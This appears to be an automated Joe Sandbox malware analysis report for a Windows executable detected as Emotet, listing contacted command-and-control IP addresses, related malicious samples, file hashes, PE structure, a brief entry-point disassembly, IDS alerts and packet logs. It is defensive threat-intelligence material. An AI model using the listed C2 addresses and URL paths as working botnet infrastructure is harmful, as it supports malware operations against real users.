              		27017ZIPLY-FIBER-LEGACY-ASNUStrue
              157.245.99.39
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              203.153.216.189
              		unknownIndonesia
              		45291SURF-IDPTSurfindoNetworkIDtrue
              174.45.13.118
              		unknownUnited States
              		33588BRESNAN-33588UStrue
              162.241.242.173
              		unknownUnited States
              		46606UNIFIEDLAYER-AS-1UStrue
              96.249.236.156
              		unknownUnited States
              		701UUNETUStrue
              123.176.25.234
              		unknownMaldives
              		7642DHIRAAGU-MV-APDHIVEHIRAAJJEYGEGULHUNPLCMVtrue
              85.105.205.77
              		unknownTurkey
              		9121TTNETTRtrue
              74.120.55.163
              		unknownCanada
              		32315WJBTN-ASCAtrue
              200.114.213.233
              		unknownArgentina
              		10318TelecomArgentinaSAARtrue
              50.91.114.38
              		unknownUnited States
              		33363BHN-33363UStrue
              78.24.219.147
              		unknownRussian Federation
              		29182THEFIRST-ASRUtrue
              24.179.13.119
              		unknownUnited States
              		20115CHARTER-20115UStrue
              139.99.158.11
              		unknownCanada
              		16276OVHFRtrue
              201.173.217.124
              		unknownMexico
              		11888TelevisionInternacionalSAdeCVMXtrue
              134.209.36.254
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              75.80.124.4
              		unknownUnited States
              		20001TWC-20001-PACWESTUStrue
              195.251.213.56
              		unknownGreece
              		12364UOMGRtrue
              121.124.124.40
              		unknownKorea Republic of
              		9318SKB-ASSKBroadbandCoLtdKRtrue
              47.144.21.12
              		unknownUnited States
              		5650FRONTIER-FRTRUStrue
              139.59.60.244
              		unknownSingapore
              		14061DIGITALOCEAN-ASNUStrue
              61.19.246.238
              		unknownThailand
              		9335CAT-CLOUD-APCATTelecomPublicCompanyLimitedTHtrue
              168.235.67.138
              		unknownUnited States
              		3842RAMNODEUStrue
              137.59.187.107
              		unknownHong Kong
              		18106VIEWQWEST-SG-APViewqwestPteLtdSGtrue
              219.74.18.66
              		unknownSingapore
              		9506SINGTEL-FIBRESingtelFibreBroadbandSGtrue
              78.187.156.31
              		unknownTurkey
              		9121TTNETTRtrue
              188.219.31.12
              		unknownItaly
              		30722VODAFONE-IT-ASNITtrue
              83.169.36.251
              		unknownGermany
              		20773GODADDYDEtrue
              74.134.41.124
              		unknownUnited States
              		10796TWC-10796-MIDWESTUStrue
              42.200.107.142
              		unknownHong Kong
              		4760HKTIMS-APHKTLimitedHKtrue
              5.196.74.210
              		unknownFrance
              		16276OVHFRtrue
              1.221.254.82
              		unknownKorea Republic of
              		3786LGDACOMLGDACOMCorporationKRtrue
              74.208.45.104
              		unknownUnited States
              		8560ONEANDONE-ASBrauerstrasse48DEtrue
              120.138.30.150
              		unknownNew Zealand
              		45179SITEHOST-AS-APSiteHostNewZealandNZtrue
              84.39.182.7
              		unknownSpain
              		15704AS15704EStrue
              97.82.79.83
              		unknownUnited States
              		20115CHARTER-20115UStrue
              24.137.76.62
              		unknownCanada
              		11260EASTLINK-HSICAtrue
              82.225.49.121
              		unknownFrance
              		12322PROXADFRtrue
              37.187.72.193
              		unknownFrance
              		16276OVHFRtrue
              181.169.34.190
              		unknownArgentina
              		10318TelecomArgentinaSAARtrue
              95.179.229.244
              		unknownNetherlands
              		20473AS-CHOOPAUStrue
              109.74.5.95
              		unknownSweden
              		43948GLESYS-ASSEtrue
              74.219.172.26
              		unknownUnited States
              		5787SNAPONSBSUStrue
              79.137.83.50
              		unknownFrance
              		16276OVHFRtrue
              103.86.49.11
              		unknownThailand
              		58955BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTHtrue
              209.141.54.221
              		unknownUnited States
              		53667PONYNETUStrue
              89.216.122.92
              		unknownSerbia
              		31042SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemrezetrue
              185.94.252.104
              		unknownGermany
              		197890MEGASERVERS-DEtrue
              5.39.91.110
              		unknownFrance
              		16276OVHFRtrue
              137.119.36.33
              		unknownUnited States
              		11426TWC-11426-CAROLINASUStrue
              104.236.246.93
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              94.23.216.33
              		unknownFrance
              		16276OVHFRtrue
              219.75.128.166
              		unknownJapan17511OPTAGEOPTAGEIncJPtrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1495910
              Start date and time:2024-08-20 17:46:03 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 45s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:ExeFile (356).exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@4/0@0/97
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 46
              • Number of non-executed functions: 73
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: ExeFile (356).exe

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              94.200.114.161ExeFile (226).exeGet hashmaliciousEmotetBrowse
              • 94.200.114.161/KN2k/QHavZNk7lTSx8eJLpbP/0vd7gjsQ5TsEb0Rcx/
              ExeFile (106).exeGet hashmaliciousEmotetBrowse
              • 94.200.114.161/cHAjU/OuEQIhBlus38A7g/
              71.72.196.159ExeFile (196).exeGet hashmaliciousEmotetBrowse
              • 71.72.196.159/2IGyEh4lLVAFVrg/6EDAF/YrTlOqfPq/7ALhWaZlzInVzVn7fD/bAqO88sEz98xOzh/VXmfH3epoFKlKrI/
              3Zn3npGt2R.docGet hashmaliciousUnknownBrowse
              • 71.72.196.159/jzbe8u/
              85.152.162.105ExeFile (226).exeGet hashmaliciousEmotetBrowse
                ExeFile (145).exeGet hashmaliciousEmotetBrowse
                  ExeFile (156).exeGet hashmaliciousEmotetBrowse
                    ExeFile (196).exeGet hashmaliciousEmotetBrowse
                      ExeFile (106).exeGet hashmaliciousEmotetBrowse
                        KBDYAK.exeGet hashmaliciousEmotetBrowse
                          task1.exeGet hashmaliciousEmotetBrowse
                            task1.exeGet hashmaliciousEmotetBrowse
                              task1.exeGet hashmaliciousEmotetBrowse
                                task1.exeGet hashmaliciousEmotetBrowse

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  TWC-10796-MIDWESTUSExeFile (369).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (367).exeGet hashmaliciousEmotetBrowse
                                  • 72.135.200.124
                                  ExeFile (371).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (378).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (384).exeGet hashmaliciousEmotetBrowse
                                  • 174.100.27.229
                                  ExeFile (388).exeGet hashmaliciousEmotetBrowse
                                  • 66.61.94.36
                                  ExeFile (39).exeGet hashmaliciousEmotetBrowse
                                  • 66.61.94.36
                                  ExeFile (394).exeGet hashmaliciousEmotetBrowse
                                  • 74.135.120.91
                                  ExeFile (22).exeGet hashmaliciousEmotetBrowse
                                  • 71.72.196.159
                                  ExeFile (286).exeGet hashmaliciousEmotetBrowse
                                  • 74.135.120.91
                                  TWC-10796-MIDWESTUSExeFile (369).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (367).exeGet hashmaliciousEmotetBrowse
                                  • 72.135.200.124
                                  ExeFile (371).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (378).exeGet hashmaliciousEmotetBrowse
                                  • 74.136.144.133
                                  ExeFile (384).exeGet hashmaliciousEmotetBrowse
                                  • 174.100.27.229
                                  ExeFile (388).exeGet hashmaliciousEmotetBrowse
                                  • 66.61.94.36
                                  ExeFile (39).exeGet hashmaliciousEmotetBrowse
                                  • 66.61.94.36
                                  ExeFile (394).exeGet hashmaliciousEmotetBrowse
                                  • 74.135.120.91
                                  ExeFile (22).exeGet hashmaliciousEmotetBrowse
                                  • 71.72.196.159
                                  ExeFile (286).exeGet hashmaliciousEmotetBrowse
                                  • 74.135.120.91
                                  TELECABLESpainESExeFile (226).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  ExeFile (145).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  ExeFile (156).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  ExeFile (171).exeGet hashmaliciousEmotetBrowse
                                  • 93.156.165.186
                                  ExeFile (196).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  ExeFile (106).exeGet hashmaliciousEmotetBrowse
                                  • 85.152.162.105
                                  jew.m68k.elfGet hashmaliciousUnknownBrowse
                                  • 188.171.114.252
                                  arm7.elfGet hashmaliciousMiraiBrowse
                                  • 188.171.226.33
                                  SZwdzMMRBU.elfGet hashmaliciousUnknownBrowse
                                  • 85.152.244.213
                                  VapIQOTGj7.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                  • 212.89.7.12
                                  DU-AS1AEExeFile (377).exeGet hashmaliciousEmotetBrowse
                                  • 91.75.75.46
                                  ExeFile (384).exeGet hashmaliciousEmotetBrowse
                                  • 94.206.45.18
                                  ExeFile (39).exeGet hashmaliciousEmotetBrowse
                                  • 91.75.75.46
                                  ExeFile (64).exeGet hashmaliciousEmotetBrowse
                                  • 91.75.75.46
                                  ExeFile (22).exeGet hashmaliciousEmotetBrowse
                                  • 94.200.114.161
                                  ExeFile (285).exeGet hashmaliciousEmotetBrowse
                                  • 91.75.75.46
                                  ExeFile (226).exeGet hashmaliciousEmotetBrowse
                                  • 94.200.114.161
                                  ExeFile (145).exeGet hashmaliciousEmotetBrowse
                                  • 94.200.114.161
                                  ExeFile (196).exeGet hashmaliciousEmotetBrowse
                                  • 94.200.114.161
                                  ExeFile (106).exeGet hashmaliciousEmotetBrowse
                                  • 94.200.114.161

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):6.185253964595847
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:ExeFile (356).exe
                                  File size:437'248 bytes
                                  MD5:4c1c997c16309a2d391e1d39988000cc
                                  SHA1:199ebff853acd5f3209ea81c75d48d1db20334cc
                                  SHA256:c37ae465ddd63d49f36380cf223d1b0d3117021190d73bc37ee132ec10020342
                                  SHA512:835ac956a6c9c89802caa93e6e84aab306bb604bd93f6ca20ba428fb5f8217a18f5c840217368fbb0883555ce004c6ed8b2a46ce7d272d50910c18dcb9d5bb92
                                  SSDEEP:6144:vXBr9LW/6DUvum8W71YQvq6H/iaRT8oITZO/rVurq:vXdNDDUvum8W5lv7Ha+ThmZo5uG
                                  TLSH:6D947B136AC4C138F4961B35F8AAEAF14391BD1A5F3882CBFEC4775B6D671809C36606
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|..L...L...L...#k..\...#k*.,...Ee..A...L...<...#k+.e...#k..M...k.[.M...#k..M...RichL...................PE..L.....e_...........

                                  File Icon

                                  Icon Hash:0e0e0f0d1e3add1f

                                  Static PE Info

                                  General

                                  Entrypoint:0x410a9b
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x5F6508C3 [Fri Sep 18 19:21:39 2020 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:39948763cc1873dc50981ea479aab099

                                  Entrypoint Preview

                                  Instruction
                                  call 00007F6DC0B5E2A5h
                                  jmp 00007F6DC0B5A58Eh
                                  mov edi, edi
                                  push ebp
                                  mov ebp, esp
                                  mov edx, dword ptr [ebp+08h]
                                  push esi
                                  push edi
                                  test edx, edx
                                  je 00007F6DC0B5A709h
                                  mov edi, dword ptr [ebp+0Ch]
                                  test edi, edi
                                  jne 00007F6DC0B5A715h
                                  call 00007F6DC0B5BA72h
                                  push 00000016h
                                  pop esi
                                  mov dword ptr [eax], esi
                                  call 00007F6DC0B5BA16h
                                  mov eax, esi
                                  jmp 00007F6DC0B5A735h
                                  mov eax, dword ptr [ebp+10h]
                                  test eax, eax
                                  jne 00007F6DC0B5A706h
                                  mov byte ptr [edx], al
                                  jmp 00007F6DC0B5A6E4h
                                  mov esi, edx
                                  sub esi, eax
                                  mov cl, byte ptr [eax]
                                  mov byte ptr [esi+eax], cl
                                  inc eax
                                  test cl, cl
                                  je 00007F6DC0B5A705h
                                  dec edi
                                  jne 00007F6DC0B5A6F5h
                                  test edi, edi
                                  jne 00007F6DC0B5A713h
                                  mov byte ptr [edx], 00000000h
                                  call 00007F6DC0B5BA3Ch
                                  push 00000022h
                                  pop ecx
                                  mov dword ptr [eax], ecx
                                  mov esi, ecx
                                  jmp 00007F6DC0B5A6C8h
                                  xor eax, eax
                                  pop edi
                                  pop esi
                                  pop ebp
                                  ret
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  mov ecx, dword ptr [esp+04h]
                                  test ecx, 00000003h
                                  je 00007F6DC0B5A726h
                                  mov al, byte ptr [ecx]
                                  add ecx, 01h
                                  test al, al
                                  je 00007F6DC0B5A750h
                                  test ecx, 00000003h
                                  jne 00007F6DC0B5A6F1h
                                  add eax, 00000000h
                                  lea esp, dword ptr [esp+00000000h]
                                  lea esp, dword ptr [esp+00000000h]
                                  mov eax, dword ptr [ecx]
                                  mov edx, 7EFEFEFFh
                                  add edx, eax
                                  xor eax, FFFFFFFFh
                                  xor eax, edx
                                  add ecx, 04h
                                  test eax, 81010100h
                                  je 00007F6DC0B5A6EAh
                                  mov eax, dword ptr [ecx-04h]
                                  test al, al
                                  je 00007F6DC0B5A734h
                                  test ah, ah
                                  je 00007F6DC0B5A726h

                                  Rich Headers

                                  Programming Language:
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [IMP] VS2008 SP1 build 30729
                                  • [C++] VS2010 build 30319
                                  • [EXP] VS2010 build 30319
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x1c9f00x42.rdata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1c01c0x8c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x4c1f0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x6f0000xeec.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x191f00x1c.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1b8380x40.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x190000x1ac.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x17a6e0x17c002918294d11fcf50d51f870e66a4e619eFalse0.5352487664473684DOS executable (COM)6.120585434914318IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x190000x3a320x3c00781ea65d4fba89049baed19ff8fd7748False0.35279947916666665data4.850442112080569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x1d0000x416c0x1000c6306a330127025aa96c1b57a0fcd902False0.221923828125data2.5497119214608133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x220000x4c1f00x4c200add876cb58db3633c854af0e75fe9ec8False0.31388867508210183data6.141207657208505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x6f0000x1d300x1e00ea9aac25c86f4cd5d2db5957b7bc6e8fFalse0.4217447916666667data4.176257282412653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  DAGHHHHHTY0x225200xde00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsEnglishUnited States0.506809543918919
                                  RT_ICON0x303200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x328c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x34e700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x374180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x399c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x3bf680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x3e5100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x40ab80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x430600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x456080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x47bb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x4a1580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x4c7000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x4eca80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x512500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x537f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x55da00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x583480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x5a8f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_ICON0x5ce980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5428423236514522
                                  RT_GROUP_ICON0x5f4400x11edataEnglishUnited States0.24125874125874125
                                  RT_MANIFEST0x5f5600x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786
                                  None0x5f6bc0xeb33dataEnglishUnited States1.0004318147846738

                                  Imports

                                  DLLImport
                                  KERNEL32.dllVirtualAlloc, Process32NextW, Process32FirstW, CreateToolhelp32Snapshot, CreateThread, SetStdHandle, SetFilePointer, WriteConsoleW, LoadLibraryW, GetStringTypeW, LCMapStringW, FlushFileBuffers, GetConsoleMode, GetConsoleCP, HeapReAlloc, MultiByteToWideChar, CreateProcessW, OpenProcess, TerminateProcess, QueryFullProcessImageNameW, CloseHandle, GetCurrentProcess, GetLastError, FormatMessageW, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetSystemTimeAsFileTime, HeapAlloc, RaiseException, RtlUnwind, EncodePointer, DecodePointer, GetCommandLineA, HeapSetInformation, GetStartupInfoW, HeapFree, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, GetProcAddress, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, CreateFileW
                                  USER32.dllSendMessageW, CreateWindowExW, wsprintfW, LoadIconW, LoadCursorW, RegisterClassExW, SetTimer, UpdateWindow, GetMessageW, TranslateMessage, DispatchMessageW, PostQuitMessage, ShowWindow, MessageBoxW, SetWindowTextW, GetWindowTextW, DefWindowProcW
                                  ADVAPI32.dllGetUserNameW, GetTokenInformation, LookupAccountSidW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges
                                  COMCTL32.dllInitCommonControlsEx
                                  PSAPI.DLLGetProcessMemoryInfo
                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW

                                  Exports

                                  NameOrdinalAddress
                                  Run10x40ec40

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                  2024-08-20T17:47:30.327401+0200TCP2854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131497238080192.168.2.12120.138.30.150
                                  2024-08-20T17:48:48.814321+0200TCP2854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M1316241880192.168.2.12174.45.13.118
                                  2024-08-20T17:47:03.074373+0200TCP2854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13162404443192.168.2.1294.23.237.171
                                  2024-08-20T17:48:53.453903+0200TCP2854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131624198080192.168.2.1287.106.136.232
                                  2024-08-20T17:47:59.609413+0200TCP2854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131497268080192.168.2.12137.59.187.107

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 20, 2024 17:47:21.367636919 CEST4971280192.168.2.1271.72.196.159
                                  Aug 20, 2024 17:47:21.373328924 CEST804971271.72.196.159192.168.2.12
                                  Aug 20, 2024 17:47:21.373495102 CEST4971280192.168.2.1271.72.196.159
                                  Aug 20, 2024 17:47:21.373636007 CEST4971280192.168.2.1271.72.196.159
                                  Aug 20, 2024 17:47:21.373673916 CEST4971280192.168.2.1271.72.196.159
                                  Aug 20, 2024 17:47:21.378580093 CEST804971271.72.196.159192.168.2.12
                                  Aug 20, 2024 17:47:21.378607035 CEST804971271.72.196.159192.168.2.12
                                  Aug 20, 2024 17:47:21.378627062 CEST804971271.72.196.159192.168.2.12
                                  Aug 20, 2024 17:47:21.378770113 CEST4971280192.168.2.1271.72.196.159
                                  Aug 20, 2024 17:47:21.378820896 CEST804971271.72.196.159192.168.2.12
                                  Aug 20, 2024 17:47:21.378833055 CEST804971271.72.196.159192.168.2.12
                                  Aug 20, 2024 17:47:21.378906012 CEST804971271.72.196.159192.168.2.12
                                  Aug 20, 2024 17:47:21.379698992 CEST4971280192.168.2.1271.72.196.159
                                  Aug 20, 2024 17:47:21.383654118 CEST804971271.72.196.159192.168.2.12
                                  Aug 20, 2024 17:47:21.384548903 CEST804971271.72.196.159192.168.2.12
                                  Aug 20, 2024 17:47:24.938365936 CEST497228080192.168.2.12134.209.36.254
                                  Aug 20, 2024 17:47:24.943387985 CEST808049722134.209.36.254192.168.2.12
                                  Aug 20, 2024 17:47:24.943517923 CEST497228080192.168.2.12134.209.36.254
                                  Aug 20, 2024 17:47:24.943783045 CEST497228080192.168.2.12134.209.36.254
                                  Aug 20, 2024 17:47:24.943847895 CEST497228080192.168.2.12134.209.36.254
                                  Aug 20, 2024 17:47:24.948651075 CEST808049722134.209.36.254192.168.2.12
                                  Aug 20, 2024 17:47:24.948700905 CEST808049722134.209.36.254192.168.2.12
                                  Aug 20, 2024 17:47:24.948749065 CEST808049722134.209.36.254192.168.2.12
                                  Aug 20, 2024 17:47:24.948760033 CEST808049722134.209.36.254192.168.2.12
                                  Aug 20, 2024 17:47:24.948764086 CEST808049722134.209.36.254192.168.2.12
                                  Aug 20, 2024 17:47:24.949459076 CEST808049722134.209.36.254192.168.2.12
                                  Aug 20, 2024 17:47:28.274552107 CEST497238080192.168.2.12120.138.30.150
                                  Aug 20, 2024 17:47:28.279652119 CEST808049723120.138.30.150192.168.2.12
                                  Aug 20, 2024 17:47:28.282876015 CEST497238080192.168.2.12120.138.30.150
                                  Aug 20, 2024 17:47:28.283018112 CEST497238080192.168.2.12120.138.30.150
                                  Aug 20, 2024 17:47:28.283061028 CEST497238080192.168.2.12120.138.30.150
                                  Aug 20, 2024 17:47:28.287863016 CEST808049723120.138.30.150192.168.2.12
                                  Aug 20, 2024 17:47:28.288080931 CEST808049723120.138.30.150192.168.2.12
                                  Aug 20, 2024 17:47:28.288163900 CEST808049723120.138.30.150192.168.2.12
                                  Aug 20, 2024 17:47:28.288175106 CEST808049723120.138.30.150192.168.2.12
                                  Aug 20, 2024 17:47:28.288193941 CEST808049723120.138.30.150192.168.2.12
                                  Aug 20, 2024 17:47:30.327294111 CEST808049723120.138.30.150192.168.2.12
                                  Aug 20, 2024 17:47:30.327400923 CEST497238080192.168.2.12120.138.30.150
                                  Aug 20, 2024 17:47:30.327493906 CEST497238080192.168.2.12120.138.30.150
                                  Aug 20, 2024 17:47:30.332926989 CEST808049723120.138.30.150192.168.2.12
                                  Aug 20, 2024 17:47:32.852833986 CEST4972480192.168.2.1294.23.216.33
                                  Aug 20, 2024 17:47:32.858127117 CEST804972494.23.216.33192.168.2.12
                                  Aug 20, 2024 17:47:32.858289003 CEST4972480192.168.2.1294.23.216.33
                                  Aug 20, 2024 17:47:32.858660936 CEST4972480192.168.2.1294.23.216.33
                                  Aug 20, 2024 17:47:32.858719110 CEST4972480192.168.2.1294.23.216.33
                                  Aug 20, 2024 17:47:32.863457918 CEST804972494.23.216.33192.168.2.12
                                  Aug 20, 2024 17:47:32.863579035 CEST4972480192.168.2.1294.23.216.33
                                  Aug 20, 2024 17:47:32.863624096 CEST804972494.23.216.33192.168.2.12
                                  Aug 20, 2024 17:47:32.863657951 CEST4972480192.168.2.1294.23.216.33
                                  Aug 20, 2024 17:47:32.863660097 CEST804972494.23.216.33192.168.2.12
                                  Aug 20, 2024 17:47:32.863677979 CEST804972494.23.216.33192.168.2.12
                                  Aug 20, 2024 17:47:32.863688946 CEST804972494.23.216.33192.168.2.12
                                  Aug 20, 2024 17:47:32.863985062 CEST804972494.23.216.33192.168.2.12
                                  Aug 20, 2024 17:47:32.868396997 CEST804972494.23.216.33192.168.2.12
                                  Aug 20, 2024 17:47:32.868475914 CEST804972494.23.216.33192.168.2.12
                                  Aug 20, 2024 17:47:35.966233969 CEST497258080192.168.2.12157.245.99.39
                                  Aug 20, 2024 17:47:35.971314907 CEST808049725157.245.99.39192.168.2.12
                                  Aug 20, 2024 17:47:35.971416950 CEST497258080192.168.2.12157.245.99.39
                                  Aug 20, 2024 17:47:35.971529961 CEST497258080192.168.2.12157.245.99.39
                                  Aug 20, 2024 17:47:35.971560955 CEST497258080192.168.2.12157.245.99.39
                                  Aug 20, 2024 17:47:35.976577044 CEST808049725157.245.99.39192.168.2.12
                                  Aug 20, 2024 17:47:35.976609945 CEST808049725157.245.99.39192.168.2.12
                                  Aug 20, 2024 17:47:35.976641893 CEST808049725157.245.99.39192.168.2.12
                                  Aug 20, 2024 17:47:35.976702929 CEST808049725157.245.99.39192.168.2.12
